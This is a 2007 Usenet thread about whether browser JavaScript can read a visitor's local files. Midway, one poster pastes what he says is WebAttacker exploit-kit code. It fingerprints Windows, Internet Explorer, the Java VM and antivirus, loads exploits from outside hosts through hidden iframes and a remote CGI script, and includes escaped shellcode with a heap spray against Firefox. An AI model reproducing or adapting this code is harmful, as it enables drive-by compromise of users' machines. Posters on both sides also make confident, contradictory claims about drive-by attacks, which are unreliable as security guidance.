40  2792 
navti said:
>
I saw here
http://java.sun.com/javase/6/docs/te...ocs/index.html
that javascript has built-in methods such as cp, dir, date etc
how do i get these to run on the client computer ?
That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.
--
On May 24, 4:42 pm, Lee <REM0VElbspamt...@cox.netwrote:
navti said:
I saw here
http://java.sun.com/javase/6/docs/te...e/jsdocs/index....
that javascript has built-in methods such as cp, dir, date etc
how do i get these to run on the client computer ?
That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.
--
ok. so how do i do a dir of a directory and display it in the
browser ?
On Thu, 24 May 2007 08:44:41 -0700, navti wrote:
On May 24, 4:42 pm, Lee <REM0VElbspamt...@cox.netwrote:
>navti said:
>I saw here
>http://java.sun.com/javase/6/docs/te...e/jsdocs/index....
>that javascript has built-in methods such as cp, dir, date etc
>how do i get these to run on the client computer ?
That page describes Javascript methods available in jrunscript, which
is not the engine you'll find in a web browser.
ok. so how do i do a dir of a directory and display it in the browser ?
You do not have access to the local machine without having an extension
allowing that access installed on the local machine.
navti <na****@gmail.comwrote in
news:11**********************@p47g2000hsd.googlegr oups.com:
>that javascript has built-in methods such as cp, dir, date etc
>how do i get these to run on the client computer ?
That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.
--
ok. so how do i do a dir of a directory and display it in the
browser ?
can you think of the absolute mayhem that would arise if websites could
create/alter the filesystem of the computer that the web browser/client is
on????
there is good reason that that sort of thing is not permitted with plain
ol' javascript.
On May 24, 5:09 pm, Good Man <h...@letsgo.comwrote:
navti <nav...@gmail.comwrote innews:11**********************@p47g2000hsd.google groups.com:
that javascript has built-in methods such as cp, dir, date etc
how do i get these to run on the client computer ?
That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.
--
ok. so how do i do a dir of a directory and display it in the
browser ?
can you think of the absolute mayhem that would arise if websites could
create/alter the filesystem of the computer that the web browser/client is
on????
there is good reason that that sort of thing is not permitted with plain
ol' javascript.
i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.
On Thu, 24 May 2007 10:37:03 -0700, navti wrote:
On May 24, 5:09 pm, Good Man <h...@letsgo.comwrote:
>navti <nav...@gmail.comwrote innews:11**********************@p47g2000hsd.google groups.com:
>that javascript has built-in methods such as cp, dir, date etc
>how do i get these to run on the client computer ?
>That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.
ok. so how do i do a dir of a directory and display it in the
browser ?
can you think of the absolute mayhem that would arise if websites could
create/alter the filesystem of the computer that the web browser/client is
on????
there is good reason that that sort of thing is not permitted with plain
ol' javascript.
i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.
No, he was not... and you must have your browser set to trust anything
that it downloads.
On May 24, 6:43 pm, Ivan Marsh <anno...@you.nowwrote:
On Thu, 24 May 2007 10:37:03 -0700, navti wrote:
On May 24, 5:09 pm, Good Man <h...@letsgo.comwrote:
navti <nav...@gmail.comwrote innews:11**********************@p47g2000hsd.google groups.com:
that javascript has built-in methods such as cp, dir, date etc
how do i get these to run on the client computer ?
That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.
ok. so how do i do a dir of a directory and display it in the
browser ?
can you think of the absolute mayhem that would arise if websites could
create/alter the filesystem of the computer that the web browser/client is
on????
there is good reason that that sort of thing is not permitted with plain
ol' javascript.
i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.
No, he was not...
it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
have you seen the code of webattacker ?
i havent but is it not mostly javascript ?
On May 24, 4:22 pm, navti <nav...@gmail.comwrote:
On May 24, 6:43 pm, Ivan Marsh <anno...@you.nowwrote:
On Thu, 24 May 2007 10:37:03 -0700, navti wrote:
On May 24, 5:09 pm, Good Man <h...@letsgo.comwrote:
>navti <nav...@gmail.comwrote innews:11**********************@p47g2000hsd.google groups.com:
>that javascript has built-in methods such as cp, dir, date etc
>how do i get these to run on the client computer ?
>That page describes Javascript methods available in jrunscript,
>which is not the engine you'll find in a web browser.
ok. so how do i do a dir of a directory and display it in the
browser ?
>can you think of the absolute mayhem that would arise if websites could
>create/alter the filesystem of the computer that the web browser/client is
>on????
>there is good reason that that sort of thing is not permitted with plain
>ol' javascript.
i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.
No, he was not...
it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
have you seen the code of webattacker ?
i havent but is it not mostly javascript ?
There is a way to show all the folders of your c: drive in an iframe.
Is this what happened? Did it show your basic filesystem and merely
say it took everything? I agree with the other users, unless you
installed or accepted it cannot happen.
On Thu, 24 May 2007 13:22:43 -0700, navti wrote:
On May 24, 6:43 pm, Ivan Marsh <anno...@you.nowwrote:
>On Thu, 24 May 2007 10:37:03 -0700, navti wrote:
On May 24, 5:09 pm, Good Man <h...@letsgo.comwrote:
navti <nav...@gmail.comwrote
innews:11**********************@p47g2000hsd.googl egroups.com:
>that javascript has built-in methods such as cp, dir, date etc
>how do i get these to run on the client computer ?
>That page describes Javascript methods available in jrunscript,
which is not the engine you'll find in a web browser.
ok. so how do i do a dir of a directory and display it in the
browser ?
>can you think of the absolute mayhem that would arise if websites
could create/alter the filesystem of the computer that the web
browser/client is on????
>there is good reason that that sort of thing is not permitted with
plain ol' javascript.
i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.
No, he was not...
it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
have you seen the code of webattacker ?
i havent but is it not mostly javascript ?
I'm guessing it's mostly HTML... but you can't read the local file system
with HTML any more than you can with javascript.
You cannot get to the local machine without installing a conduit to the
local machine.
navti wrote:
it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
have you seen the code of webattacker ?
i havent but is it not mostly javascript ?
You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...
Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).
--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.comwrote:
navti wrote:
it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
have you seen the code of webattacker ?
i havent but is it not mostly javascript ?
You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...
Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).
i just found some of the webattacker code
<iframe src="http://fl4w.info/shit/index.php" width=1 height=1></
iframe>
<!--hppage status="protected"-->
<HTML xmlns:IE>
<TITLE>Demo page</TITLE>
<HEAD><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20% 4C%41%4E
%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%7 4%22%3E%3C%21%2D%2D
%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%6 3%74%69%6F%6E
%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%7 0%5F%6F%6B
%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2 E
%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F
%53%43%52%49%50%54%3E"));//--></SCRIPT>
<STYLE type='text/css'>
IE\:clientCaps {behavior:url(#default#clientcaps)}
</STYLE>
</HEAD>
<BODY onLoad="setTimeout('Run_BOF()',2000);"><NOSCRIPT>T o display this
page you need a browser with JavaScript support.</NOSCRIPT>
<CENTER><H1>This site is under construction...</H1></CENTER>
<IFRAME name="StatPage" width=5 height=5 style="display:none"></
IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></
IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">
var ExploitNumber=0;
function GetVersion(CLSID)
{
if (oClientCaps.isComponentInstalled(CLSID,"Component ID"))
{return
oClientCaps.getComponentVersion(CLSID,"ComponentID ").split(",");}
else
{return Array(0,0,0,0);}
}
function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows 95') != -1) return "95"
else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
else if (IE_vers.indexOf('Windows 98') != -1) return "98"
else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}
function Run_BOF()
{
if (ExploitNumber==4)
{
self.focus();
for (i=1 ; i <=4 ; i++)
{
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="pluginst.htm"></iframe>');
}
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="ie0601d.htm"></iframe>');
}
}
var CGI_Script="http://jag.mews.ru/cgi-bin/ie0601.cgi";
if (navigator.appName=="Microsoft Internet Explorer")
{
Click_Request=CGI_Script+"?click";
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);
var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
for (var i=0; i < PatchList.length; i++)
{
ServicePack=PatchList[i];
j=ServicePack.indexOf('SP');
if (j != -1)
{
ServicePack=ServicePack.substr(j);
Click_Request=Click_Request+'&'+ServicePack;
}
}
StatPage.location=Click_Request;
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-
AAA5-00401C608500}");
var IE_vers = GetVersion("{89820200-
ECBD-11CF-8B85-00AA005B4383}");
fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
try
{
var oNortonAV=new
ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config
Wizard initialization
fNortonAV=1;
}
catch(e){}
try
{
var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); //
McAfee Security Download Control initialization
fMcAfee=1;
}
catch(e){}
switch (WinOS)
{
case "2K":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM =
5.0.3810.0 or higher
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=2; }
}
break;
case "2K3":
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
break;
case "XP":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if
JVM = 5.0.3810.0 or higher
{
for (var i=0; i < PatchList.length; i+
+)
{
if (PatchList[i]=="SP2")
{ XP_SP2_patched=1; }
}
if (XP_SP2_patched==0)
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
}
else
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=5; }
else
{ ExploitNumber=4; }
}
}
break;
default:
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else
{ ExploitNumber=2; } // if JVM =
5.0.3810.0 or higher
break;
}
// launching exploit which number is depends on Windows and
IE versions
switch (ExploitNumber)
{
case 1:
Trojan_Path=CGI_Script+"?exploit=MS03-11";
ObjectContainer.innerHTML='<applet
archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'"
code="TakePrivileges.class" width=1 height=1><param name="ModulePath"
value="'+Trojan_Path+'"></applet>';
break;
case 2:
CHM_base='//ie0601b.chm'+'::'+'/main.htm';
Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
oMSITS=document.createElement("<OBJECT
data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");
document.body.appendChild(oMSITS);
document.title="Loaded !";
break;
case 3:
window.open("ie0601c.htm","Info","left=2000,top=20 00,screenX=2000,screenY=2000,width=50,height=50,sc rollbars=1,menubar=0,titlebar=0,toolbar=0,status=0 ");
self.focus();
break;
case 4:
;setTimeout('Run_BOF()',2000);
break;
case 5:
PageContainer.location="ie0601e.wmf";
break;
default:
break;
}
}
}
else if (navigator.appName=="Netscape")
{
StatPage.location=CGI_Script+"?click";
if (navigator.userAgent.indexOf('Firefox') != -1)
{
PageContainer.location="mfsa0601.htm";
}
}
else
{
StatPage.location=CGI_Script+"?click";
}
</script>
</BODY>
</HTML>
this is mfsa0601.htm
<!--hppage status="protected"-->
<HTML><HEAD><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20% 4C%41%4E
%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%7 4%22%3E%3C%21%2D%2D
%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%6 3%74%69%6F%6E
%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%7 0%5F%6F%6B
%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2 E
%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F
%53%43%52%49%50%54%3E"));//--></SCRIPT><SCRIPT language="javascript">
var
Shellcode=unescape("%u9090%u9090%u3390%u33c0%uebc9 %u5e12%ub966%u0104%ufe8b
%u2e80%u8006%u0136%ue246%uebf7%ue805%uffe9%uffff
%u5bf0%u7a90%u9043%u357b%u087f%u5dfa%u7d90%u0827%u 38fa%u4ece
%ub246%ue038%u143d%u1bc5%u3f2f%u7bf9%uc60f
%u12d0%ue108%uf047%u40f4%u7ae4%u65ec%u6590%u082b
%u6de2%u1390%u9050%u2365%ue208%u0b90%u0890%uc8ca%u 595a
%u5253%u5554%u4b35%u5353%u4807%u6341%u357c%u7f6a%u 076a%uc738%u086b
%u3747%u137f%u4790%u9013%u2377%u90b2%u0f47%u0ef0%u 4790%u923b
%u8347%u4790%u9a43%u95c4%u1555%ueff3%u048b%u0404%u f388%u880b
%u2b33%u0443%u9ad7%uc457%u213d%u7734%u74ef%u0404%u 9004%u2b5b
%u9203%uc159%ue038%u5858%uf059%u582b%ud704%uc462%u 059f%u1591%u58ef
%u0404%u8804%u0bf3%u3388%u692b%ud704%u85c4%ue9df
%uef78%u0447%u0404%u0459%uefd7%u04dc%u0404%u7b6f%u 777b
%u3441%u7134%u6c66%u7235%u7c6a%u3578%u7a79%u6834%u 6e6c%u6932%u756e
%u6e34%u376a%u373d%u3536%u6c68%u446e%u7f6a%u7377%u 6e74%u427b
%u4d52%u4658%u3739%u3a37%u3a32%u0737");
function Run_BOF() {
var heapSprayToAddress=0x12000000;
var heapBlockSize=0x400000;
var ShellcodeSize=Shellcode.length * 2;
var spraySlideSize=heapBlockSize-(ShellcodeSize+0x38);
var spraySlide1 = unescape("%u002C%u11C0");
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
var spraySlide2 = unescape("%u002C%u1200");
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
var spraySlide3 = unescape("%u9090%u9090");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{ memory[i]=(i%3==0) ? spraySlide1 + Shellcode:
(i%3==1) ? spraySlide2 + Shellcode: spraySlide3 + Shellcode; }
location.href="javascript :void (new InstallVersion());";
var eaxAddress = 0x1180002C;
(new InstallVersion).compareTo(new Number(eaxAddress >1));
}
function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{ spraySlide+=spraySlide; }
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</SCRIPT></HEAD>
<BODY onload="Run_BOF()"><NOSCRIPT>To display this page you need a
browser with JavaScript support.</NOSCRIPT></BODY></HTML>
</HTML>
navti wrote:
On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.comwrote:
>navti wrote:
>>it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
have you seen the code of webattacker ?
i havent but is it not mostly javascript ?
You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...
Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).
i just found some of the webattacker code
<snip code>
OK, rather than say VBScript, is the main culprit, I should have said
ActiveX.
All that JavaScript does is pry and develop identifying data to pass to
either a CGI script or to an ActiveX control (apparently to mess with
McAffee?).
--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
On May 24, 10:55 pm, -Lost <maventheextrawo...@techie.comwrote:
navti wrote:
On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.comwrote:
navti wrote:
it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
have you seen the code of webattacker ?
i havent but is it not mostly javascript ?
You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...
Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).
i just found some of the webattacker code
<snip code>
OK, rather than say VBScript, is the main culprit, I should have said
ActiveX.
All that JavaScript does is pry and develop identifying data to pass to
either a CGI script or to an ActiveX control (apparently to mess with
McAffee?).
--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
ok. so there is no way javascript can read a clients local files ?
navti <na****@gmail.comwrote:
>i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.
He could display a list of your files just by referring your browser
to a URL of file:///c:/ or something like that. That would cause your
browser (IE, at any rate) to show you what's on your disk. Your
"attacker" would never see this, it's simply your browser reading your
disk and showing you the result. In a normal security environment,
there's nothing in Javascript to collect this data and send it
anywhere.
--
Tim Slattery Sl********@bls.gov http://members.cox.net/slatteryt
On May 25, 7:39 am, navti <nav...@gmail.comwrote:
On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.comwrote:navti wrote:
it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
....
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
The (dreaded) MSVM.
If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Java applet) of any
number of security holes in those Microsoft VM's. Even
the 3810 build has existing security issues that will
never be fixed.
Microsoft themselves (who made the MSVM) recommend
upgrading to the Sun Java Plug-In. When security
issues are discovered in the Java Plug-In - they
are fixed quickly, and the end users are prompted
to update.
Note those comments have little to do with Javascript,
it is Java (a different language) that runs in the MSVM
and the Java Plug-In. The script is apparently attempting
to determine what the applet should attack - though the
author might have taken a simpler approach that required
no javascript.
I suspect, however, that one of the other poster's got
the answer right when they suggested the host had done
something to make it *appear* to you that information
had been stolen (linking to a common directory on C:
drive would be enough to convince most people who
use IE).
Andrew T.
On May 25, 5:13 am, Andrew Thompson <andrewtho...@gmail.comwrote:
On May 25, 7:39 am, navti <nav...@gmail.comwrote:
On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.comwrote:navti wrote:
it all happened automatically without any intervention. i was using
win2k and ie6 at the time. i have since switched to mac os x.
...
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
The (dreaded) MSVM.
If this script found a 3809 or previous build MSVM, it
might have taken advantage (using a Java applet) of any
number of security holes in those Microsoft VM's. Even
the 3810 build has existing security issues that will
never be fixed.
Microsoft themselves (who made the MSVM) recommend
upgrading to the Sun Java Plug-In. When security
issues are discovered in the Java Plug-In - they
are fixed quickly, and the end users are prompted
to update.
Note those comments have little to do with Javascript,
it is Java (a different language) that runs in the MSVM
and the Java Plug-In. The script is apparently attempting
to determine what the applet should attack - though the
author might have taken a simpler approach that required
no javascript.
I suspect, however, that one of the other poster's got
the answer right when they suggested the host had done
something to make it *appear* to you that information
had been stolen (linking to a common directory on C:
drive would be enough to convince most people who
use IE).
Andrew T.
he stole my files . i know this for a fact.
why would you think it was otherwise ? have you been living down a
mineshaft for the past 5 years ? never heard of xss ? are you in some
sort of state of denial ?
only an ignoramus would try and deny it was possible for a webserver
to compromise a client's machine.
my mistake is thinking javascript was enough . obviously it was a
combination of javascript, java, activex , php , xml etc etc
navti wrote:
On May 25, 5:13 am, Andrew Thompson <andrewtho...@gmail.comwrote:
>On May 25, 7:39 am, navti <nav...@gmail.comwrote:
>>On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.comwrote:>
navti wrote:
it all happened automatically without any intervention. i was
using win2k and ie6 at the time. i have since switched to mac os
x.
...
>> if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
The (dreaded) MSVM.
<snipped/>
>
he stole my files . i know this for a fact.
why would you think it was otherwise ? have you been living down a
mineshaft for the past 5 years ? never heard of xss ? are you in some
sort of state of denial ?
only an ignoramus would try and deny it was possible for a webserver
to compromise a client's machine.
my mistake is thinking javascript was enough . obviously it was a
combination of javascript, java, activex , php , xml etc etc
JavaScript, php, xml and etc. does not have *anything* to do with it!
The only way a webserver can compromise a client in the way you described
is eiter:
1.) A signed Java Applet where you explicitly have ansvered "Yes" when
asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have ansvered "Yes"
when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of your
browser
wide-open.
Neither PHP nor JavaScript is able to access your files.
--
Dag.
The only way a webserver can compromise a client in the way you described
is eiter:
1.) A signed Java Applet where you explicitly have ansvered "Yes" when
asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have ansvered "Yes"
when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of your
browser
wide-open.
Neither PHP nor JavaScript is able to access your files.
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
navti said:
>
>The only way a webserver can compromise a client in the way you described
is eiter:
1.) A signed Java Applet where you explicitly have ansvered "Yes" when
asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have ansvered "Yes"
when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of your
browser
wide-open.
Neither PHP nor JavaScript is able to access your files.
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
You know this for a fact? Can you name such a site?
Or did this happen to a friend of a friend?
--
"navti" <na****@gmail.comwrote in message
news:11**********************@p77g2000hsh.googlegr oups.com...
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
If your system is so insecure that this can happen then you should unplug
your system from the internet. It's unsafe.
On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.netwrote:
navti said:
The only way a webserver can compromise a client in the way you described
is eiter:
1.) A signed Java Applet where you explicitly have ansvered "Yes" when
asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have ansvered "Yes"
when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of your
browser
wide-open.
Neither PHP nor JavaScript is able to access your files.
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
You know this for a fact? Can you name such a site?
Or did this happen to a friend of a friend?
--
it happened to me on windoze which is why i scrapped windoze for mac
os x and linux.
you guys are seriously trying to tell me yhou have never heard of
these kind of attacks ?
i suggest you visit some security websites to see how prevalent they
are and how easy they seem to be to execute.
On May 25, 11:20 am, "rf" <r...@invalid.comwrote:
"navti" <nav...@gmail.comwrote in message
news:11**********************@p77g2000hsh.googlegr oups.com...
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
If your system is so insecure that this can happen then you should unplug
your system from the internet. It's unsafe.
i did, it was called windows and i replaced it with a secure system
called os x,
navti wrote:
>The only way a webserver can compromise a client in the way you
described is eiter:
1.) A signed Java Applet where you explicitly have ansvered
"Yes" when asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have ansvered
"Yes" when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of
your browser
wide-open.
Neither PHP nor JavaScript is able to access your files.
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
Prove it!
Prove it by posting a link to such a site, and I'll go there myself
with all my different browsers to see if you are right!
--
Dag.
navti wrote:
On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.netwrote:
>navti said:
>>>The only way a webserver can compromise a client in the way you
described is eiter:
1.) A signed Java Applet where you explicitly have ansvered
"Yes" when asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have
ansvered "Yes" when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of
your browser
wide-open.
>>>Neither PHP nor JavaScript is able to access your files.
>>what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client
doesnt have to do anything to give up his data to a malicious
website so why are you denying it ?
You know this for a fact? Can you name such a site?
Or did this happen to a friend of a friend?
--
it happened to me on windoze which is why i scrapped windoze for mac
os x and linux.
you guys are seriously trying to tell me yhou have never heard of
these kind of attacks ?
i suggest you visit some security websites to see how prevalent they
are and how easy they seem to be to execute.
The only way that can happen is in scenario 3.) above when using IE.
And then only when someone have manually turned off the default security
settings in IE first.
I suggest you post a link to this "Magic" malicious site...
--
Dag.
On May 25, 1:57 pm, "Dag Sunde" <m...@dagsunde.comwrote:
navti wrote:
On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.netwrote:
navti said:
>>The only way a webserver can compromise a client in the way you
described is eiter:
1.) A signed Java Applet where you explicitly have ansvered
"Yes" when asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have
ansvered "Yes" when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of
your browser
wide-open.
>>Neither PHP nor JavaScript is able to access your files.
>what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client
doesnt have to do anything to give up his data to a malicious
website so why are you denying it ?
You know this for a fact? Can you name such a site?
Or did this happen to a friend of a friend?
--
it happened to me on windoze which is why i scrapped windoze for mac
os x and linux.
you guys are seriously trying to tell me yhou have never heard of
these kind of attacks ?
i suggest you visit some security websites to see how prevalent they
are and how easy they seem to be to execute.
The only way that can happen is in scenario 3.) above when using IE.
And then only when someone have manually turned off the default security
settings in IE first.
I suggest you post a link to this "Magic" malicious site...
--
Dag.
there are thousands of sites which can harm your computer.
most are porn etc
tell me you are pulling my leg ?
you have never heard of webattacker, xss etc etc
"Dag Sunde" <me@dagsunde.comwrote in message
news:46**********************@news.wineasy.se...
navti wrote:
>>The only way a webserver can compromise a client in the way you
described is eiter:
1.) A signed Java Applet where you explicitly have ansvered
"Yes" when asked if you wanted to let the applet run.
2.) A signed ActiveX control where you explicitly have ansvered
"Yes" when
asked if you wanted to let the control run.
3.) Any ActiveX control, and you have the security settings of
your browser
wide-open.
Neither PHP nor JavaScript is able to access your files.
what about drive by downloads where the client simply has to visit a
malicious web site to be compromised ? you know that the client doesnt
have to do anything to give up his data to a malicious website so why
are you denying it ?
Prove it!
Prove it by posting a link to such a site, and I'll go there myself
with all my different browsers to see if you are right!
Aren't you starting to get an image of a short squat fellow domiciled beneath
an over water conveyance structure...
--
Dag.
navti wrote:
On May 25, 1:57 pm, "Dag Sunde" <m...@dagsunde.comwrote:
>navti wrote:
>>On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.netwrote:
navti said:
>>>>>The only way a webserver can compromise a client in the way you
>described is eiter:
> 1.) A signed Java Applet where you explicitly have ansvered
> "Yes" when asked if you wanted to let the applet run.
> 2.) A signed ActiveX control where you explicitly have
>ansvered "Yes" when
> asked if you wanted to let the control run.
> 3.) Any ActiveX control, and you have the security settings
>of your browser
> wide-open.
>>>>>Neither PHP nor JavaScript is able to access your files.
>>>>what about drive by downloads where the client simply has to
visit a malicious web site to be compromised ? you know that the
client doesnt have to do anything to give up his data to a
malicious website so why are you denying it ?
>>>You know this for a fact? Can you name such a site?
Or did this happen to a friend of a friend?
>>>--
>>it happened to me on windoze which is why i scrapped windoze for mac
os x and linux.
>>you guys are seriously trying to tell me yhou have never heard of
these kind of attacks ?
>>i suggest you visit some security websites to see how prevalent they
are and how easy they seem to be to execute.
The only way that can happen is in scenario 3.) above when using IE.
And then only when someone have manually turned off the default
security settings in IE first.
I suggest you post a link to this "Magic" malicious site...
--
Dag.
there are thousands of sites which can harm your computer.
most are porn etc
I promise not to blush... Post a harmful link!
>
tell me you are pulling my leg ?
No, definitely not!
you have never heard of webattacker, xss etc etc
Of course I have, but those is only harmful to those that have opened
up the default security settings of their browsers... javaScript alone
can't do any harm to my computer. And neither can Applets or ActiveX
controls without me giving them explicit permission to do so.
This thread started with you claiming that an "enemy's" web-site
managed to access your computer
<quote>
>i visited a website of an enemy and he not only did a listing of my
local files he also copied them to his server. im pretty certqain he
was using javascript.
</quote>
Post a link to this site. It is in everybody's interest that you do so.
--
Dag.
